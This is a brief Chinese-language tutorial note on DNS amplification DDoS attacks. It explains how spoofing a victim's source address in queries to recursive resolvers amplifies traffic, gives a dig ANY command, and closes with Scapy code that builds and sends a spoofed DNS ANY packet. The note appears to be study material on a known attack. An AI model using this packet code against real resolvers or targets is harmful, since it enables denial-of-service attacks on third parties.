DNS放大攻击

  • 基于UDP
  • 产生大流量的攻击方法
  • 单机的带宽优势
  • 巨大单机数量形成的流量汇聚
  • 利用协议特性实现放大效果的流量

    DNS放大效果

  • 查询请求流量小

  • dig any hp.com @202.106.0.20 (流量放大越8倍)

    攻击原理

  • 伪造源地址为被攻击目标地址,向大量递归域名查询服务器发起查询

  • DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDOS

    scapy构造攻击数据包

    ```python

i=IP() #构造 IP 数据包 i.display() i.dst=”202.106.0.20” i.display() u=UDP() #构造 UDP 数据包 u.display() d=DNS() #构造 DNS 数据包 d.display() d.rd=1 d.qdcount=1 d.display() q=DNSQR() #设置查询目标 q.display() q.qname=’qq.com’ q.qtype=255 #(代表any) d.qd=q # 设置目标 d.display() r=(i/u/d) #拼接数据包 r r.display() sr1(r) i.src=”192.168.1.110” r=(i/u/d) r.display() send(r) #发送数据包

发送30字节,回210字节

```